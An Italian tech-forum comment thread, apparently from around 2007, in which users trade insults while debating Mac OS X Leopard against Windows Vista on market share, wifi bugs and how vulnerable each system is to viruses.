      Si conosco diverse persone che usano OSX.Io per primo, che ha casa un imac G3 fermo alla 10.3.9 ma più in là non posso andare.Comunque io uso per lavoro e per hobby windows.Ho degli amici che usano OSX, ma una sola di queste persone lo sa sfruttare a fondo.Gli altri invece lo usano come un qualsiasi sistema operativo.Infatti il mio compagno di laboratorio è appena passato da win a osx... volete sapere come usa osx? esattamente come usava windows. Nonostante gli abbia mostrato la fluidità di lavoro del sistema mac.Mah... questi utenti windows che solo per sentirsi più fighi passano a mac...
    • Gio scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      Io sono uno di quelli..... fatti un giro nelle università dove la gente sa quello che usa... Windows se ne va scomparendo.
    • FinalCut scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      - Scritto da: Gutsy Gibbon
      Salve gente,
      Mac os se non erro ha il 6& dell'utenza mondiale
      di PC... ma io conosco solo utenti uindos o,
      pochissimi, linux. E' proprio così diffuso,
      almeno in italia, il gioiellino
      apple??fino a due anni fa al di fuori dell'ambito lavorativo (dove ne vedo a pacchi di Mac) conoscevo solo un amico che usava un Mac.Oggi ho 6 amici/conoscenti che usano un Mac oltre me.(linux)(apple)
    • Pel scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      - Scritto da: Gutsy Gibbon
      Salve gente,
      Mac os se non erro ha il 6& dell'utenza mondiale
      di PC... ma io conosco solo utenti uindos o,
      pochissimi, linux. E' proprio così diffuso,
      almeno in italia, il gioiellino
      apple??In Italia proprio no, mi pare che le stime ufficiali siano intorno al 2%, ma in crescita esponenziale. A livello mondiale, del resto, pochi mesi fa era poco sopra il 4 e adesso punta verso il 6 - in pratica, quasi un raddoppio. Comunque, nonostante le percentuali apparentemente basse, di utenti Mac io ne ho trovati una marea, sia nei posti ovvi (studi grafici, giornalisti, editori, fotografi, musicisti, Dj, stilisti) sia in quelli meno ovvi. Qualche esempio curioso? Mi ricordo una foto di Bill Gates nel suo ufficio. dietro di lui si intravedeva, inconfondibile, un Mac. Anche il candidato democratico sconfitto da Bush alle ultime elezioni USA era un macaco (Powerbook 17"). Qualche anno fa ho visto il capo dell'ufficio progetti europeo di Asus fare una conferenza stampa... usando il suo PowerBook G4, ben nascosto dentro il trespolo dello speaker (l'ho beccato a fine conferenza mentre cercava di imboscarlo nella borsa senza farsi notare). A una JavaConference sempre qualche anno fa il creatore di Java ha proclamato dal palco che il mac era la migliore piattaforma di sviluppo Java. e nel farlo ha sollevato in alto, perché tutti lo vedessero, il suo notebook Mac.Ho un amico che spesso va alla DefCon (il più famoso congresso degli hacker). Mi ha detto che negli ultimi anni vede sempre più hacker con il MacBook. Ha chiesto a uno di loro (lui invece usa Linux) il perché e lui gli ha risposto che gli piaceva entrare nel computer degli altri, ma non voleva che qualcuno riuscisse a entrare nel suo...
    • pippo75 scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      - Scritto da: Gutsy Gibbon
      Salve gente,
      Mac os se non erro ha il 6& dell'utenza mondiale
      di PC... ma io conosco solo utenti uindos o,
      pochissimi, linux. E' proprio così diffuso,
      almeno in italia, il gioiellino
      apple??uno lo conosco, e ne conosco un'atro che ne sarebbe interessato, vedi domanda sotto ( o sopra a seconda di dove la mettono ).
      • pippo75 scrive:
        Re: Ma conoscete qualcuno che usa MacOS ?
        - Scritto da: pippo75
        - Scritto da: Gutsy Gibbon

        Salve gente,

        Mac os se non erro ha il 6& dell'utenza mondiale

        di PC... ma io conosco solo utenti uindos o,

        pochissimi, linux. E' proprio così diffuso,

        almeno in italia, il gioiellino

        apple??

        uno lo conosco, e ne conosco un'atro che ne
        sarebbe interessato, vedi domanda sotto ( o sopra
        a seconda di dove la mettono
        ).correzione, nessuna domanda, ho già la risposta, cercavo se esisteva skype per macos.
  • mmmm scrive:
    il wireless wpa2 va a singhiozzo
    Ho un macbook pro con leopard in azinda e la rete wireless in wpa2 va quando ca**o vuole, no autenticandosi, bloccandomi la user, dicendo che è connesso ma non è vero ecc... complimenti dato che ho speso "solo" 3000 per sto portatile. Senza contare i crash di finder, cose mai viste con tiger mentre invece ho imparato ad apprezzare con il leopardo. Non c'è che dire, Apple sta veramente raggiungendo Microsoft...
    • MeX scrive:
      Re: il wireless wpa2 va a singhiozzo
      scusa ma di che marca è il tuo hotspot?
    • ciufolo scrive:
      Re: il wireless wpa2 va a singhiozzo
      - Scritto da: mmmm
      Ho un macbook pro con leopard in azinda e la rete
      wireless in wpa2 va quando ca**o vuole, no
      autenticandosi, bloccandomi la user, dicendo che
      è connesso ma non è vero ecc... complimenti dato
      che ho speso "solo" 3000 per sto portatile.
      Senza contare i crash di finder, cose mai viste
      con tiger mentre invece ho imparato ad apprezzare
      con il leopardo. Non c'è che dire, Apple sta
      veramente raggiungendo
      Microsoft...e perché non specifichi meglio certe caratteristiche tecniche così come le situazioni dei crash del finder? se capitano a tutti in quella situazione è un problema per davvero, se capitano solo a te...il problema forse non è solo della macchina.sai com'è le descrizioni mooolto generiche sono molto da trolleggiante...senza contare che è risaputo che tutti acquistano un portatile solo per passare la giornata a divertirsi a collegarsi a qualche hotspot wireless e se non funziona il portatile fa schifo per forza di cose :-D
    • Stefano scrive:
      Re: il wireless wpa2 va a singhiozzo
      WPA2 con certificato?Se ti dice che è connesso ma non riesci a navigare prova a connetterti comunque manualmente.... menu in alto a destra del wifi, seleziona la rete a cui ti vuoi connettere (se l'essid è nascosto usa "accedi ad un altro network" e scrivi l'essid nel campo corretto), seleziona la criptatura giusta e.... dovresti essere connesso!
      • mmmm scrive:
        Re: il wireless wpa2 va a singhiozzo
        che differenza fa la marca degli access point? windows non fa queste differenze. Sono dei Cisco comunque, ma non si cerchi di dire che è colpa egli access point dato che funzionano con qualunque portatile win, cellulari wifi e altro. I crash di finder a volte sono dovuti nella copia di file da chiave usb, a volte salvando un file scaricato da firefox mi dice che sul desktop non ho i permessi di scrittura ecc. Comunque basta farsi un giro sui forum del supporto apple per capire che non è tutto oro quello che luccica... o sono tutti troll anche li? Grazie per le indicazioni sulla configurazione, il problema è che il portatile è configurato correttamente, funziona, poi dopo un paio di giorni smette di funzionare senza che nessuno cambi le impostazioni: il login i 802.1x si incasina, la mia user di identificazione viene bloccata causa troppi tentativi errati (ma mica mi chiede la password!) mentre leopard dice che la rete è connessa correttamente... ma chiaramente non funziona. Per risolvere il problema apple ha pure rilasciato un update che doveva essere risolutivo, l'ho installato ma a quanto pare non ha funzionato. Attendo l'update 10.5.2 che dovrebbe uscire a inizio 2008 (due main update in così poco tempo credo che la dicano abbastanza lunga... onore alla velocità di fix, ma anche un grosso dubbio sulla bontà iniziale)
        • MeX scrive:
          Re: il wireless wpa2 va a singhiozzo
          sul forum Apple non ci sono troll... ma quelli che hanno davvero dei problemi che poi vengono risolti (iMac che freezzavano: risolto, testiera freezata sui mac book pro: risolto...) Apple non fa computer perfetti, la perfezione non esiste!La marca dell'hotspot ti è stata chiesta per capire più a fondo il tuo problema e cercare di aiutarti.Ad esempio con la Fonera non è possibli utilizzare una criptazione diversa dal WPA2 se uso la WPA2 funziona il mac ma non il mio portatile Fujitsu... ad esempio!Per quanto riguarda i tuoi problemi proverei a dare una controllata alla RAM ;)
        • budello scrive:
          Re: il wireless wpa2 va a singhiozzo
          macbook 2.2 con un linksys/cisco .11g in WPA2 nessun problema anche dal garage che è un piano sotto all'AP
    • frank hillary scrive:
      Re: il wireless wpa2 va a singhiozzo
      Per uno che trolleggia affermando che macbook pro non funziona a dovere, posso portare il mio contributo dicendo che il mio macbook core 2 duo 2 ghz 2 gb ram e' il migliore mac che io abbia mai avuto dal 1985 ad oggi, senza troppe specifiche e spiegazioni posso affermare che hardware e software sono veramente una cosa sola e che questo portatile pio' avere una sola ed unica definizione esaustiva: FUNZIONAPoi, se io fossi nell'utente che vanta problemi wifi, sarei meno stizzoso e cercherei di risolvere la cosa approfondendo la materia senza attendere fantasiosi salvataggi dagli aggiornamenti di sistema.
      • AMEN scrive:
        Re: il wireless wpa2 va a singhiozzo
        - Scritto da: frank hillary
        Poi, se io fossi nell'utente che vanta problemi
        wifi, sarei meno stizzoso e cercherei di
        risolvere la cosa approfondendo la materia senza
        attendere fantasiosi salvataggi dagli
        aggiornamenti di sistema.Il caro vecchio Frank...lui non deve mica lavorare, lui approfondisce la materia...Ma per favore
  • os user scrive:
    aumento dela velocita'
    le feature non sono male ma la cosa che preferisco degli os Apple e' l'aumento di prestazioni ad ogni nuovo rilascio. Con Tiger il mio vecchio iMac rispondeva decisamente meglio ma con Leopard vola e vi parlo di un computer vecchio di 6 anni! In un'italia che si avvia (secondo il NYT) verso il declino e la depressione sono piccoli sprazzi di felicita' che aiutano ad andare avanti :) Mi spiace per chi invece ha comprato vista , l'ho fatto anch'io (installato con dual boot) ma fortunatamente posso switchare per il 98% su osx saluti
    • FDG scrive:
      Re: aumento dela velocita'
      - Scritto da: os user
      Con Tiger il
      mio vecchio iMac rispondeva decisamente meglio ma
      con Leopard vola e vi parlo di un computer
      vecchio di 6 anni!La mia impressione, confermata da quanto ho letto su ArsTechnica, è che non si tratta di un incremento delle prestazioni ma di una maggiore fluidità del sistema.
  • contenuto ingiurioso scrive:
    OT - Petizione!
    Per cambiare la foto di Annunziata! [img]http://www.deandreis.it/l/community/avatar/05d7d96eb906675acd07ae988794cdc3/Avatar.jpg[/img]Con sta faccia da fanboy ... cioè ... ne vogliamo parlare?Luca, sul serio, almeno sotto Natale faccelo sto regalo: ridacci il nostro "shining" quotidiano.
    • Mr.NO scrive:
      Re: OT - Petizione!
      Sottoscrivo!
    • flashbak scrive:
      Re: OT - Petizione!
      Metti la tua foto online cosi' per par condicio si puo' criticare anche la tua !
    • lellykelly scrive:
      Re: OT - Petizione!
      e adesso, ti senti soddisfatto?aposto per tutta la giornata?
    • FDG scrive:
      Re: OT - Petizione!
      - Scritto da: contenuto ingiurioso
      Per cambiare la foto di Annunziata! Sottoscrivo!
    • Elisabetta + 4 colleghe scrive:
      Re: OT - Petizione!
      Luca Annunziata sei il sex symbol del nostro reparto marketing! Il tuo sorriso con le fossette e' da mangiare, non cambiare la foto !Hot smack
      • Luca Annunziata scrive:
        Re: OT - Petizione!
        Grazie.Prometto di stamparmi questa missiva e di appenderla accanto al computer. :D
      • contenuto ingiurioso scrive:
        Re: OT - Petizione!
        - Scritto da: Elisabetta + 4 colleghe
        Luca Annunziata sei il sex symbol del nostro
        reparto marketing! Il tuo sorriso con le fossette
        e' da mangiare, non cambiare la foto
        !

        Hot smackCaXXo, questo sega completamente le gambe alla mia iniziativa! Non avevo valutato potessero partecipare anche delle donne!Però potevate sostenere la causa dicendo che era più affascinante nella versione "shining". Che poi nella foto c'è pure lo stesso soffitto che si vede nell'ultimo video dei Subsonica (la Glaciazione). Curiosa analogia.[yt]qHyeYYzFEfI[/yt]Magari lo hanno girato a casa di Annunziata dopo che ha traslocato.(newbie)Vabbeh, ci terremo fanboy . ;)
  • Paul scrive:
    peccatucci del leopardo di Cupertino.
    Se si parlava di windows sarebbero stati DELITTI ATROCI
    • franco scrive:
      Re: peccatucci del leopardo di Cupertino.
      "se si fosse parlato..."Sbagliare è lecito è il perseverare che non viene perdonato a M$...riflettici/eteci
    • innominato scrive:
      Re: peccatucci del leopardo di Cupertino.
      - Scritto da: Paul
      Se si parlava di windows sarebbero stati DELITTI
      ATROCIUn bug che porta a data loss.Peccatuccio veniale, cosa vuoi che sia?
      • ciufolo scrive:
        Re: peccatucci del leopardo di Cupertino.
        - Scritto da: innominato
        - Scritto da: Paul

        Se si parlava di windows sarebbero stati DELITTI

        ATROCI

        Un bug che porta a data loss.
        Peccatuccio veniale, cosa vuoi che sia?mentre un bug che ti paralizza il network è poca cosa...suvvia torna su vista che fa per te
      • Hovercraft scrive:
        Re: peccatucci del leopardo di Cupertino.
        - Scritto da: innominato
        - Scritto da: Paul

        Se si parlava di windows sarebbero stati DELITTI

        ATROCI

        Un bug che porta a data loss.
        Peccatuccio veniale, cosa vuoi che sia?Se una supermodel da' in escandescenze la si perdona.Se lo fa una cozza qualsiasi si dice che e' una str...La stessa cosa per OSX vs. Vista. Mi pare piu' che ragionevole :)
        • nome e guardone scrive:
          Re: peccatucci del leopardo di Cupertino.

          Se una supermodel da' in escandescenze la si
          perdona.
          Se lo fa una cozza qualsiasi si dice che e' una
          str...

          La stessa cosa per OSX vs. Vista. Mi pare piu'
          che ragionevole
          :)Se uno ragiona con il pisello hai sicuramente ragione e vale anche per oxs vs vista.
          • Hovercraft scrive:
            Re: peccatucci del leopardo di Cupertino.
            - Scritto da: nome e guardone
            Se uno ragiona con il pisello hai sicuramente
            ragione e vale anche per oxs...Se uno ragiona col pisello e scrive correttamente "OSX", con cosa ragionerà mai chi scrive "oxs"?
        • ciufolo scrive:
          Re: peccatucci del leopardo di Cupertino.
          a me pare che la supermodel sia Vista che c'ha messo 5 anni per prepararsi prima di uscire in pubblicobah
        • Mythos scrive:
          Re: peccatucci del leopardo di Cupertino.
          Sei appena diventato il mio eroe persnale.
      • MeX scrive:
        Re: peccatucci del leopardo di Cupertino.
        quale? quello che dopo 3 settimane era fixato?E poi non sai che fastidio non poter staccare il cavo USB dell'HD esterno mentre copiava...
      • Mythos scrive:
        Re: peccatucci del leopardo di Cupertino.
        Mai successo in Windows.Ma vaff..
    • anonymous scrive:
      Re: peccatucci del leopardo di Cupertino.
      - Scritto da: Paul
      Se si parlava di windows sarebbero stati DELITTI
      ATROCISai com'è.... Leopard 129, Vista Ultimate 599E le innovazioni di Leopard, l'utente Vista, le vedrà si e no con Windows 7, quandò uscirà in un prossimo futuro....
      • BLah scrive:
        Re: peccatucci del leopardo di Cupertino.
        Ma sei scemo?Te ti compri Vista Ultimate? A te andrebbe bene pure l'Home Basic... O sei un bambino che o tutto o niente?Mavaff..!
      • nome e guardone scrive:
        Re: peccatucci del leopardo di Cupertino.

        E le innovazioni di Leopard, l'utente Vista, le
        vedrà si e no con Windows 7, quandò uscirà in un
        prossimo
        futuro....Ahahahahha innovazioni? Time machine? Stacks, ma per favore. Ci sono voluti 20 anni alla ueppolz per fare un sistema operativo decente e ha dovuto copiarne metà da unix e ci venite a sminchiare con le innovazioni.
        • PLONK_THIS scrive:
          Re: peccatucci del leopardo di Cupertino.
          - Scritto da: nome e guardone

          E le innovazioni di Leopard, l'utente Vista, le

          vedrà si e no con Windows 7, quandò uscirà in un

          prossimo

          futuro....

          Ahahahahha innovazioni? Time machine? Stacks, ma
          per favore. Ci sono voluti 20 anni alla ueppolz
          per fare un sistema operativo decente e ha dovuto
          copiarne metà da unix e ci venite a sminchiare
          con le
          innovazioni.ma LOL detto da uno che un sistema decente non lo usa ancora e lo vedr^à, forse, tra qualche anno...dai su torna a disattivare l'UAC
          • nome e guardone scrive:
            Re: peccatucci del leopardo di Cupertino.

            ma LOL detto da uno che un sistema decente non lo
            usa ancora e lo vedr^à, forse, tra qualche
            anno...dai su torna a disattivare
            l'UACCos'è quel ^à? Hai dovuto premere mela-pera-alt-canc-shift-p per fare la a accentata e ti sei sbagliato? Devi esercitarti con il mouse a 3 bottoni, aiuta la manualità.
          • Mythos scrive:
            Re: peccatucci del leopardo di Cupertino.

            Devi esercitarti con il mouse a 3 bottoni, aiuta
            la
            manualità.Mmh.Homo Superior eh?
          • MeX scrive:
            Re: peccatucci del leopardo di Cupertino.
            con OSX impostare la lingua lettone è un attimo!Vai sulle impostazioni di lingua e aggiungi la tastiera lettone e premendo ALT puoi fare simpatici caratteri lettoni come: ā ī ē ... in Windows devi installare un software di terze parti o impostare la lingua lettone ma con il layaout di tastiera Lituano questo inspiegabilmente e ci sono arrivato solo dopo diversi giorni di prove a casaccio... (se te lo stai chiedendo mi interessa perchè la mia ragazza è lettone) capisci... sono piccole cose ma ti fanno capire cosa vuol dire "semplicità"
          • nome e guardone scrive:
            Re: peccatucci del leopardo di Cupertino.
            - Scritto da: MeX
            con OSX impostare la lingua lettone è un attimo!
            Vai sulle impostazioni di lingua e aggiungi la
            tastiera lettone e premendo ALT puoi fare
            simpatici caratteri lettoni come: ā ī
            ē ... in Windows devi installare un
            software di terze parti o impostare la lingua
            lettone ma con il layaout di tastiera Lituano
            questo inspiegabilmente e ci sono arrivato solo
            dopo diversi giorni di prove a casaccio... (se te
            lo stai chiedendo mi interessa perchè la mia
            ragazza è lettone) capisci... sono piccole cose
            ma ti fanno capire cosa vuol dire
            "semplicità"Perchè se imposti la tastiera lettone che succede?
          • MeX scrive:
            Re: peccatucci del leopardo di Cupertino.
            non scrive i caratteri lettoni :) so che pare assurdo ma è così! :)
        • anonynomous scrive:
          Re: peccatucci del leopardo di Cupertino.
          - Scritto da: nome e guardone

          E le innovazioni di Leopard, l'utente Vista, le

          vedrà si e no con Windows 7, quandò uscirà in un

          prossimo

          futuro....

          Ahahahahha innovazioni? Time machine? Stacks, ma
          per favore. Ci sono voluti 20 anni alla ueppolz
          per fare un sistema operativo decente e ha dovuto
          copiarne metà da unix e ci venite a sminchiare
          con le
          innovazioni.la personalizzazione del Finder, l'anteprima immediata dei PDF, documenti, allegati mail e altro che non ho voglia di spiegare a chi non sa nemmeno di cosa si sta parlando, sei andato un attimo sul sito della Apple e hai preso le prime due caratteristiche nuove di Leopard.Ripassa quando l'avrai provato.(troll)
    • saxpax scrive:
      Re: peccatucci del leopardo di Cupertino.
      io dico solo questo, con Windows diffuso oltre il 90% si conosce qualsiasi vulnerabilità, possibile che Mac OS X, cosi poco diffuso sia cosi insicuro....
      • PLONK_THIS scrive:
        Re: peccatucci del leopardo di Cupertino.
        - Scritto da: saxpax
        io dico solo questo, con Windows diffuso oltre il
        90% si conosce qualsiasi vulnerabilità,ma LOL...ma ti rendi conto delle scempiaggini che dici?se si conoscessero tutte mi spieghi come mai ne escono di nuove a scadenze regolari? possibile
        che Mac OS X, cosi poco diffuso sia cosi
        insicuro....certo, mi porti anche dei dati certi alle teorie che continui a propinare?ci commenti anche questi dati per una volta senza svicolare come stai facendo da un paio di giorni?http://secunia.com/graph/?type=adv&period=all&prod=96http://secunia.com/graph/?type=adv&period=all&prod=16http://secunia.com/graph/?type=adv&period=2007&prod=13223forza non glissare anche stavolta
        • saxpax scrive:
          Re: peccatucci del leopardo di Cupertino.
          leggi pure questo:http://business.webnews.it/news/leggi/7396/osx-supera-windows-243-bug-a-44/
          • PLONK_THIS scrive:
            Re: peccatucci del leopardo di Cupertino.
            leggiti questohttp://punto-informatico.it/b.aspx?i=2147002&m=2148113#p2148113
          • alexjenn scrive:
            Re: peccatucci del leopardo di Cupertino.
            Certo, se linki a un sito che si basa su ZDNet, quel sito così professionale dove una sua giornalista, Marie Joe Foley ha scritto, addirittura, che Leopard è la copia di Vista...Alèee ooh, alèee ooh.
      • alexjenn scrive:
        Re: peccatucci del leopardo di Cupertino.
        Cosa c'entra?Secondo te esiste un'equazione diffusione = vulnerabilità, per cui
        dissfusione =

        vulnerabilità.Ma porc..., cosa mi tocca leggere...
  • saxpax scrive:
    MAC OS X più vulnerabile di Windows.
    mi sa tanto che Apple abbia fatto una figuraccia, guardate qui:http://www.italiasw.com/mac-os-x-e-piu-vulnerabile-di-windows/il mito di Mac è finito, è più vulnerabile di XP e Vista insieme.
    • Nello Gala scrive:
      Re: MAC OS X più vulnerabile di Windows.
      Vero!Avevo notato anch'io la notiziola e mi ero ripromesso di citarla appena possibile...Apple, che non ha saputo approfittare della ghiotta opportunità di far girare Xp e Leopard sullo stesso Mac book "intel inside" soprattutto dopo che Vista ha fatto la figura che ha fatto..Ps Ieri Ms, oggi Apple...A tutti i "linari" come me un preallarme: domani tocca a noi...Riusciranno a trovare un S.o linux che non va?Io scommetto su Novell-Suse, voci dal fondo del "mio" corridoio dicono che l'alleanza con Billino non ha reso quanto dovrebbe...Ah , io in fondo al corridoio ho il Wc,per cui fate vobis!
    • FinalCut scrive:
      Re: MAC OS X più vulnerabile di Windows.
      - Scritto da: saxpax
      mi sa tanto che Apple abbia fatto una figuraccia,
      guardate
      qui:
      http://www.italiasw.com/mac-os-x-e-piu-vulnerabile

      il mito di Mac è finito, è più vulnerabile di XP
      e Vista
      insieme.Ne riparleremo quando troverai in rete il primo virus/trojan attivo per Mac OS X...(linux)(apple)PS: virus attivi e non il solito proof of concept
      • google is your friend scrive:
        Re: MAC OS X più vulnerabile di Windows.
        - Scritto da: FinalCut
        Ne riparleremo quando troverai in rete il primo
        virus/trojan attivo per Mac OS
        X...difficile... un trojan si diffonde se trova un parco macchine adeguato, e la quota di mercato del MAC è talmente bassa che persino il miglior trojan del mondo farebbe fatica a sopravvivereGIYF
        • FinalCut scrive:
          Re: MAC OS X più vulnerabile di Windows.
          - Scritto da: google is your friend
          - Scritto da: FinalCut

          Ne riparleremo quando troverai in rete il primo

          virus/trojan attivo per Mac OS

          X...

          difficile... un trojan si diffonde se trova un
          parco macchine adeguato, e la quota di mercato
          del MAC è talmente bassa che persino il miglior
          trojan del mondo farebbe fatica a
          sopravvivere


          GIYFBalle!esistevano virus per Mac OS 9 quando l'unico meccanismo di diffusione erano i floppy disk...Non esiste un solo virus che attacchi iTunes (con tutti gli 80 milioni di iPod collegati)Esistevano virus per Amiga (con il grandissimo share che aveva(rotfl) prima di sparire dalla faccia della terra O)) Il 60% dei server al mondo usa sistemi *nix e non si vedono molti virus nemmeno lì...(linux)(apple)
          • google is your friend scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: FinalCut
            Non esiste un solo virus che attacchi iTunes (con
            tutti gli 80 milioni di iPod
            collegati)nemmeno la calcolatrice di Windows è particolarmente presa di mira dai virus.E iTunes viene aggiornato in continuazione, ti sei mai chiesto il perché?
          • FinalCut scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: google is your friend
            - Scritto da: FinalCut

            Non esiste un solo virus che attacchi iTunes
            (con

            tutti gli 80 milioni di iPod

            collegati)

            E iTunes viene aggiornato in continuazione, ti
            sei mai chiesto il
            perché?forse che alla Apple ci tengono alla sicurezza a differenza di quell'altra software house di base a Redmond?PS: hai segato via tutto il resto??....come mai? (rotfl)(rotfl)(rotfl) :D @^
          • saxpax scrive:
            Re: MAC OS X più vulnerabile di Windows.
            hai dimenticato di citare la falla vivente di QuickTime
          • FinalCut scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: saxpax
            hai dimenticato di citare la falla vivente di
            QuickTime che però non ha nessun exploit attivo al momento...(linux)(apple)
          • saxpax scrive:
            Re: MAC OS X più vulnerabile di Windows.
            al momento indendi adesso, vero, ma tra un ora, con qualche nuova falla, salta fuori....con QuickTime funziona cosi
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: saxpax
            al momento indendi adesso, vero, ma tra un ora,
            con qualche nuova falla, salta fuori....con
            QuickTime funziona
            cosicerto...rimane che che però non ha nessun exploit attivo al momento...riprovaci con più serietà..
          • BLah scrive:
            Re: MAC OS X più vulnerabile di Windows.
            Quicktime per Windows, dai tempi di Win95 l'ho sempre odiato.Non funziona, semplicemente. Ed ora è diventato quasi uno spyware.Merdaccia!!
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: BLah
            Quicktime per Windows, dai tempi di Win95 l'ho
            sempre
            odiato.
            opinione soggettiva, irrilevante!
            Non funziona, semplicemente. Ed ora è diventato
            quasi uno
            spyware.
            facci degli esempi, perché stranamente non la pensano tutti come te ;-D
            Merdaccia!!dai non insultarti per dei post ad minchiam
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: BLah
            Quicktime per Windows, dai tempi di Win95 l'ho
            sempre
            odiato.
            opinione soggettiva e senza argomenti tecnici...irrilevante
            Non funziona, semplicemente. Ed ora è diventato
            quasi uno
            spyware.
            e se esemplificassi invece di svicolare?
            Merdaccia!!tu o QT?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: BLah
            Quicktime per Windows, dai tempi di Win95 l'ho
            sempre
            odiato.
            opinione soggettiva e nessun argomentazione tecnica, irrilevante!
            Non funziona, semplicemente. Ed ora è diventato
            quasi uno
            spyware.
            e immagino che oltre alla "butade" sai anche portare argomentazioni tecniche, vero? bah
          • manolo scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: PLONK_THIS
            - Scritto da: BLah

            Quicktime per Windows, dai tempi di Win95 l'ho

            sempre

            odiato.



            opinione soggettiva e nessun argomentazione
            tecnica,
            irrilevante!



            Non funziona, semplicemente. Ed ora è diventato

            quasi uno

            spyware.



            e immagino che oltre alla "butade" sai anche
            portare argomentazioni tecniche,
            vero?

            bahMa quali argomentazioni tecniche può portare un winaro.Uno che è costretto ad installarsi un petabyte di programmi antivirus, antispyware, antitrojan, antimalware, antitutto!!!E poi è comunque costretto a formattare e reinstallare tutto ogni 15 giorni perchè si ritrova il pc devastato dopo pochi minuti di navigazione in rete.Come si fa ad usare un sistema operativo che per aggiornarsi ha bisogno di un ActiveX installato nel browser: praticamente si installa un virus che gli scansiona il pc, spia i cavoli suoi e gli dice cosa aggiornare. E funziona una volta su 100. Aggiornamenti che non si installano, o che non riconoscono il programma da aggiornare (mi è successo col SP3 di Office 2003, notebook nuovo di zecca e software tutto licenziato)...ma ce ne sarebbero troppe! Ho in assistenza in continuazione computers devastati dopo poche settimane di utilizzo: sono 10 anni che faccio questo mestiere (sistemista, mi occupo dell'assistenza interna di una grande azienda), avrò formattato e reinstallato Winmerd (in tutte le sue fetenti versioni) almeno 20.000 volte.Sarà anche per questo che, personalmente, uso solo MacOSX e Linux (Archlinux, per inciso)?
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            proprio perchè è 10 anni che fai il sistemista divresti sapere il perchè ti arrivano i computer devastati e dovresti conoscere le dinamiche dell'espansione dei virus... ma evidentemente tutti questi anni non ti sono serviti a nulla.mi auguro solo che OSX prenda piede e arrivi almeno al 30-40% di diffusione, poi vediamo se non avrà virus.Solo un demente adesso perderebbe tempo per un sistema con la diffusione di OSX.Appena sofrata una certa percentuale, vedi come faranno a gara per vendervi l'antivirus.Il problema è che se anche solo il 5% di utenti Win sono dei pasticcioni completi, questo equivale a tutto l'ammontare degli utenti OSX.A credere ciecamente nella sicurezza del proprio sistema, gli utenti apple si dimostrano di una ingenuità incredibile.Ma tanto, quando poi usciranno i virus e il giorno dopo uscirà anche l'antivirus, ovviamente di marca Apple, tutti diranno quanto è brava la Apple ad aver risposto così in fretta alla minaccia.....
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Silicon Pirate
            proprio perchè è 10 anni che fai il sistemista
            divresti sapere il perchè ti arrivano i computer
            devastati e dovresti conoscere le dinamiche
            dell'espansione dei virus... ma evidentemente
            tutti questi anni non ti sono serviti a
            nulla.
            mi auguro solo che OSX prenda piede e arrivi
            almeno al 30-40% di diffusione, poi vediamo se
            non avrà
            virus.ancora con la storiella della diffusione?
            Solo un demente adesso perderebbe tempo per un
            sistema con la diffusione di
            OSX.solo un demente sostiene che windows è bucabile solo perché è diffuso.
            Appena sofrata una certa percentuale, vedi come
            faranno a gara per vendervi
            l'antivirus.
            certo...e quale sarebbe la percentuale?e 25000 cucuzze non sono un incentivo sufficiente per provarcihttp://macdailynews.com/index.php/weblog/comments/mac_os_x_virus_prize_2005_offers_25000_cash_prize/vai a pranzo che l'appetito offusca l'intelletto
            Il problema è che se anche solo il 5% di utenti
            Win sono dei pasticcioni completi, questo
            equivale a tutto l'ammontare degli utenti
            OSX.
            il problema è che se i pasticcioni sono a redmond....stiam freschi tutti.
            A credere ciecamente nella sicurezza del proprio
            sistema, gli utenti apple si dimostrano di una
            ingenuità
            incredibile.a me pare più fesso chi crede che windows sia bucabile solo perché diffuso e non perché costruito com'è
            Ma tanto, quando poi usciranno i virus e il
            giorno dopo uscirà anche l'antivirus, ovviamente
            di marca Apple, tutti diranno quanto è brava la
            Apple ad aver risposto così in fretta alla
            minaccia.....certo...sono anni che gira Norton e ancora ad oggi viene usato per evitare che nelle LAN i virus x win si propaghino via i macdai su evitiamo le figure barbine
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.

            solo un demente sostiene che windows è bucabile
            solo perché è
            diffuso.solo un demente crede che il proprio sistema sia completamente sicuro e che non sarà mai bucabile.se entrano nei computer della NSA, entrano anche nel tuo cesso di OSX. Se non entrano, vuol dire che non gliene frega un cazzo.Quando gliene fregherà, entreranno.
            certo...e quale sarebbe la percentuale?quella che fa guadagnare assicurando una diffusione tale da far percepire il pericolo. lo stabilirà chi fa analisi del settore. non lo posso dire io di certo.

            e 25000 cucuzze non sono un incentivo sufficiente
            per
            provarciche cazzo vuoi che gliene freghi a una swhouse di 25000 dollari? spiccioli.forse non hai ancora capito col tuo primordiale cervello che chi fa i virus sono quelli che poi ti fanno l'antivirus....
            il problema è che se i pasticcioni sono a
            redmond....stiam freschi
            tutti.l'interruttore del tuo cervello lo hai mai toccato da quando sei nato o lo hai sempre lasciato in funzione OFF?già.. tutti i genialoidi sono a cupertino.
            a me pare più fesso chi crede che windows sia
            bucabile solo perché diffuso e non perché
            costruito
            com'èa me pari tanto fesso tu
            certo...sono anni che gira Norton e ancora ad
            oggi viene usato per evitare che nelle LAN i
            virus x win si propaghino via i
            maccosa vorresti dimostrare? i mac sono talemente presi in considerazione che dai virus sono considerati degli switch di rete.... quando saranno considerati computer appetibili se ne vedranno delle belle. già mi immagino le scene isteriche generali.
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.

            che cazzo vuoi che gliene freghi a una swhouse di
            25000 dollari?
            spiccioli.
            forse non hai ancora capito col tuo primordiale
            cervello che chi fa i virus sono quelli che poi
            ti fanno
